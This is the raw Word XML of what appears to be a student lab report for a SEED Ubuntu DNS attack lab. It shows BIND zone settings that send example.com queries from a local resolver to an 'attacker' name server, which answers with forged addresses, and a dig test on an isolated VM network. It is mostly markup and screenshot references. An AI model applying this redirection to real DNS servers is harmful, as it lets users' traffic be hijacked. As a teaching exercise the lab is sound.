          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>We add the below information to the file “/etc/bind/named.conf.default-zones”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277A5450" w14:textId="77777777" w:rsidR="00614D33" w:rsidRDefault="00614D33" w:rsidP="00614D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00614D33">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>zone "ns.dnslabattacker.net" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9EC661" w14:textId="77777777" w:rsidR="00614D33" w:rsidRDefault="00614D33" w:rsidP="00614D33">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00614D33">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> type master;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3295E29C" w14:textId="77777777" w:rsidR="00614D33" w:rsidRDefault="00614D33" w:rsidP="00614D33">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00614D33">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> file "/etc/bind/db.attacker"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA56E04" w14:textId="3B2355B6" w:rsidR="00614D33" w:rsidRDefault="00614D33" w:rsidP="00614D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00614D33">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A09B6C" w14:textId="77777777" w:rsidR="00856C8A" w:rsidRDefault="00856C8A" w:rsidP="00614D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="752A283F" w14:textId="2228F31D" w:rsidR="00614D33" w:rsidRDefault="0084049D" w:rsidP="00614D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8036D3D" wp14:editId="78E6D9A0">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SEED-UBUNTU_21_03_2018_13_46_06.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4237B3" w14:textId="77777777" w:rsidR="00856B0B" w:rsidRDefault="00856B0B" w:rsidP="00614D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="695FA1DF" w14:textId="6B03F1AF" w:rsidR="00856B0B" w:rsidRDefault="00856B0B" w:rsidP="00614D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Now create the file “/etc/bind/db.attacker” </w:t>
      </w:r>
      <w:r w:rsidR="00273D7A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>and place the below content inside it.</w:t>
      </w:r>
      <w:r w:rsidR="00C34C9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Please observe that both the ns/dnslabattacker.net and </w:t>
      </w:r>
      <w:r w:rsidR="00000A84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker Machine both share the same </w:t>
      </w:r>
      <w:r w:rsidR="002223CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Machine with </w:t>
      </w:r>
      <w:r w:rsidR="00000A84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>IP i.e., 10.0.2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44124E07" w14:textId="7B7EB889" w:rsidR="00273D7A" w:rsidRDefault="00273D7A" w:rsidP="00614D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77A5F99" wp14:editId="68D5E63B">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SEED-UBUNTU_21_03_2018_13_48_4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BF5E31F" w14:textId="77777777" w:rsidR="009A006B" w:rsidRDefault="009A006B" w:rsidP="00614D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>After this setup, any DNS queries from the user with domain “example.com” will reach the attacker Machine because of our Apollo DNS configuration. Now we need to configure the DNS server on Attacker Machine with IP(10.0.2.5) to answer queries for example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DCB7E1" w14:textId="77777777" w:rsidR="00700366" w:rsidRDefault="00700366" w:rsidP="00614D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01DDFDB9" w14:textId="77777777" w:rsidR="00684266" w:rsidRDefault="00700366" w:rsidP="00614D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">We add the below content to the file “/etc/bind/named.conf.local” </w:t>
      </w:r>
      <w:r w:rsidR="00684266">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>on attacker Machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366CA45B" w14:textId="77777777" w:rsidR="002A43D3" w:rsidRDefault="002A43D3" w:rsidP="00614D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="115BAC54" w14:textId="2EEB8D53" w:rsidR="002223CF" w:rsidRDefault="00936090" w:rsidP="00614D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D9971E9" wp14:editId="47E5CC55">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rtualBox_SEED-UBUNTU Clone_21_03_2018_13_59_17.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9A006B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DCA1EF" w14:textId="77777777" w:rsidR="00936090" w:rsidRDefault="00936090" w:rsidP="00614D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79FE4BC5" w14:textId="3366A451" w:rsidR="00936090" w:rsidRDefault="000814C0" w:rsidP="00614D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we create a file “/etc/bind/example.com.db” with the below content. </w:t>
      </w:r>
      <w:r w:rsidR="00314E9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00314E9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03BA7FF6" wp14:editId="6ED99B3D">
            <wp:extent cx="5942965" cy="3022636"/>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_SEED-UBUNTU Clone_21_03_2018_14_02_24.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5948248" cy="3025323"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3515F707" w14:textId="40878D62" w:rsidR="00CA4657" w:rsidRDefault="00CA4657" w:rsidP="00614D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The example.com.db file contains the IP address of </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00E401D4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>www.example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> as “1.1.1.1” , mail.example.com IP address as 1.1.1.2, and all other *.example.com as 1.1.1.100. We restart the DNS servers both on Apollo and Attacker Machine and demonstrate the result verification below.</w:t>
      </w:r>
      <w:r w:rsidR="00307000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFD95D6" w14:textId="5A6A0610" w:rsidR="00151668" w:rsidRDefault="00151668" w:rsidP="00614D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>The below image restarts the DNS on Attacker Machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1388AB99" w14:textId="46E0FE46" w:rsidR="00CA4657" w:rsidRDefault="00307000" w:rsidP="00614D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D1109CB" wp14:editId="7229C114">
            <wp:extent cx="5937250" cy="3335655"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="15" name="Picture 15" descr="../../../Downloads/Screenshots/Screen%20Shot%202018-03-21%20at%202.05.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s/Screen%20Shot%202018-03-21%20at%202.05.40%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3335655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="279DD1B8" w14:textId="77777777" w:rsidR="005D253F" w:rsidRDefault="005D253F" w:rsidP="00614D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70EE438A" w14:textId="77777777" w:rsidR="00273D7A" w:rsidRDefault="00273D7A" w:rsidP="00614D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32245EA4" w14:textId="254897D3" w:rsidR="00273D7A" w:rsidRDefault="00151668" w:rsidP="00614D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we issue dig </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00E401D4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>www.example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the user machine and get the malicious IP as the reply.</w:t>
      </w:r>
      <w:r w:rsidR="008A3639">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Make sure that the nameserver on the user machine is configured with nameserver of Apollo i.e., (10.0.2.7)</w:t>
      </w:r>
      <w:r w:rsidR="00122C19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. The below image shows the IP of user machine as 10.0.2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768E4FA1" w14:textId="680357E2" w:rsidR="008A3639" w:rsidRDefault="00122C19" w:rsidP="00614D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34F63CC" wp14:editId="21BB30B7">
            <wp:extent cx="5943600" cy="3088640"/>
            <wp:effectExtent l="0" t="0" r="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SEED-UBUNTU2_21_03_2018_14_10_54.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2C80B430" w14:textId="5F955765" w:rsidR="00E54C09" w:rsidRDefault="00E54C09" w:rsidP="00614D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The below dig command executed on the client side shows the ip address of </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="00E401D4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>www.example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> as 1.1.1.1 and the additional record contains the IP of ns.dnslabattacker.net as 10.0.2.5 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7E35FB" w14:textId="060DA56F" w:rsidR="00435B82" w:rsidRDefault="000132E7" w:rsidP="00614D3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490596B" wp14:editId="1EDB0FEE">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SEED-UBUNTU2_21_03_2018_14_21_49.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E228AE7" w14:textId="77777777" w:rsidR="00DE5178" w:rsidRDefault="00DE5178" w:rsidP="00614D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6CF54E18" w14:textId="77777777" w:rsidR="00122C19" w:rsidRDefault="00122C19" w:rsidP="00614D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="384F9092" w14:textId="77777777" w:rsidR="00273D7A" w:rsidRDefault="00273D7A" w:rsidP="00614D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B37BC4C" w14:textId="77777777" w:rsidR="0084049D" w:rsidRDefault="0084049D" w:rsidP="00614D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="343F7C1D" w14:textId="77777777" w:rsidR="0084049D" w:rsidRDefault="0084049D" w:rsidP="00614D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="231A788E" w14:textId="77777777" w:rsidR="00614D33" w:rsidRPr="00614D33" w:rsidRDefault="00614D33" w:rsidP="00614D33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="169D7D57" w14:textId="77777777" w:rsidR="00614D33" w:rsidRDefault="00614D33" w:rsidP="005B6F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CAE693A" w14:textId="77777777" w:rsidR="00B24DD4" w:rsidRPr="005B6F7B" w:rsidRDefault="00B24DD4" w:rsidP="005B6F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="452BA6D4" w14:textId="77777777" w:rsidR="005B6F7B" w:rsidRDefault="005B6F7B" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="787530B2" w14:textId="77777777" w:rsidR="002A0974" w:rsidRDefault="002A0974" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45F9DD21" w14:textId="77777777" w:rsidR="0039646C" w:rsidRDefault="0039646C" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="600C108C" w14:textId="77777777" w:rsidR="0039646C" w:rsidRDefault="0039646C" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7123D456" w14:textId="77777777" w:rsidR="00431930" w:rsidRPr="002C29DB" w:rsidRDefault="00431930" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22CE70BF" w14:textId="77777777" w:rsidR="009B3EA7" w:rsidRDefault="009B3EA7" w:rsidP="006811E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5129395E" w14:textId="77777777" w:rsidR="009B3EA7" w:rsidRPr="006811E1" w:rsidRDefault="009B3EA7" w:rsidP="006811E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="506EFF0C" w14:textId="77777777" w:rsidR="006811E1" w:rsidRPr="000D5972" w:rsidRDefault="006811E1" w:rsidP="000D5972">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38201A9B" w14:textId="77777777" w:rsidR="00583FF2" w:rsidRDefault="00583FF2" w:rsidP="00583FF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F4396AC" w14:textId="77777777" w:rsidR="000D5972" w:rsidRPr="00583FF2" w:rsidRDefault="000D5972" w:rsidP="00583FF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="676B2BFD" w14:textId="77777777" w:rsidR="00583FF2" w:rsidRPr="00AD3A86" w:rsidRDefault="00583FF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00583FF2" w:rsidRPr="00AD3A86" w:rsidSect="002243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C065C4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F9582DAC"/>
    <w:lvl w:ilvl="0" w:tplc="0B9CB644">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34A"/>
    <w:rsid w:val="00000A84"/>
    <w:rsid w:val="000132E7"/>
    <w:rsid w:val="00020C66"/>
    <w:rsid w:val="000707AD"/>
    <w:rsid w:val="0007676F"/>
    <w:rsid w:val="000814C0"/>
    <w:rsid w:val="00083501"/>
    <w:rsid w:val="000A61F0"/>
    <w:rsid w:val="000D393B"/>
    <w:rsid w:val="000D5972"/>
    <w:rsid w:val="000E0043"/>
    <w:rsid w:val="000E031F"/>
    <w:rsid w:val="000E1312"/>
    <w:rsid w:val="000F1183"/>
    <w:rsid w:val="000F15FA"/>
    <w:rsid w:val="000F2CD1"/>
    <w:rsid w:val="00122C19"/>
    <w:rsid w:val="00123127"/>
    <w:rsid w:val="00145A23"/>
    <w:rsid w:val="00151668"/>
    <w:rsid w:val="00165D4A"/>
    <w:rsid w:val="001826EA"/>
    <w:rsid w:val="001B6DCD"/>
    <w:rsid w:val="001C54CB"/>
    <w:rsid w:val="001C6277"/>
    <w:rsid w:val="00200B2C"/>
    <w:rsid w:val="0022168C"/>
    <w:rsid w:val="002223CF"/>
    <w:rsid w:val="002231B4"/>
    <w:rsid w:val="0022431A"/>
    <w:rsid w:val="00233FB3"/>
    <w:rsid w:val="00247D5A"/>
    <w:rsid w:val="0025188D"/>
    <w:rsid w:val="00262E08"/>
    <w:rsid w:val="00265265"/>
    <w:rsid w:val="00265335"/>
    <w:rsid w:val="00273D7A"/>
    <w:rsid w:val="00276FAA"/>
    <w:rsid w:val="002833AA"/>
    <w:rsid w:val="0029347E"/>
    <w:rsid w:val="00295AB2"/>
    <w:rsid w:val="002A0974"/>
    <w:rsid w:val="002A27E5"/>
    <w:rsid w:val="002A43D3"/>
    <w:rsid w:val="002C29DB"/>
    <w:rsid w:val="002C521F"/>
    <w:rsid w:val="002C7EFC"/>
    <w:rsid w:val="002E409B"/>
    <w:rsid w:val="002F6005"/>
    <w:rsid w:val="002F7AAA"/>
    <w:rsid w:val="00300527"/>
    <w:rsid w:val="00307000"/>
    <w:rsid w:val="003105D2"/>
    <w:rsid w:val="00314E9B"/>
    <w:rsid w:val="003231AB"/>
    <w:rsid w:val="0032721E"/>
    <w:rsid w:val="003504C4"/>
    <w:rsid w:val="0039646C"/>
    <w:rsid w:val="003C460D"/>
    <w:rsid w:val="003F6E7F"/>
    <w:rsid w:val="00411C3F"/>
    <w:rsid w:val="00424D39"/>
    <w:rsid w:val="00431930"/>
    <w:rsid w:val="00435B82"/>
    <w:rsid w:val="00452582"/>
    <w:rsid w:val="0045782D"/>
    <w:rsid w:val="0047117F"/>
    <w:rsid w:val="0047149E"/>
    <w:rsid w:val="00496555"/>
    <w:rsid w:val="004C5656"/>
    <w:rsid w:val="004D3C16"/>
    <w:rsid w:val="005150D6"/>
    <w:rsid w:val="005178EE"/>
    <w:rsid w:val="00537B7A"/>
    <w:rsid w:val="00583FF2"/>
    <w:rsid w:val="00584308"/>
    <w:rsid w:val="005B6F7B"/>
    <w:rsid w:val="005C7511"/>
    <w:rsid w:val="005D107D"/>
    <w:rsid w:val="005D253F"/>
    <w:rsid w:val="005F78C4"/>
    <w:rsid w:val="00614D33"/>
    <w:rsid w:val="00617B4F"/>
    <w:rsid w:val="00664594"/>
    <w:rsid w:val="00673AA0"/>
    <w:rsid w:val="00675CC6"/>
    <w:rsid w:val="006811E1"/>
    <w:rsid w:val="00684266"/>
    <w:rsid w:val="00684800"/>
    <w:rsid w:val="006C6F2B"/>
    <w:rsid w:val="006D6459"/>
    <w:rsid w:val="006E012A"/>
    <w:rsid w:val="006E5065"/>
    <w:rsid w:val="006F07C9"/>
    <w:rsid w:val="00700366"/>
    <w:rsid w:val="00702734"/>
    <w:rsid w:val="007062EC"/>
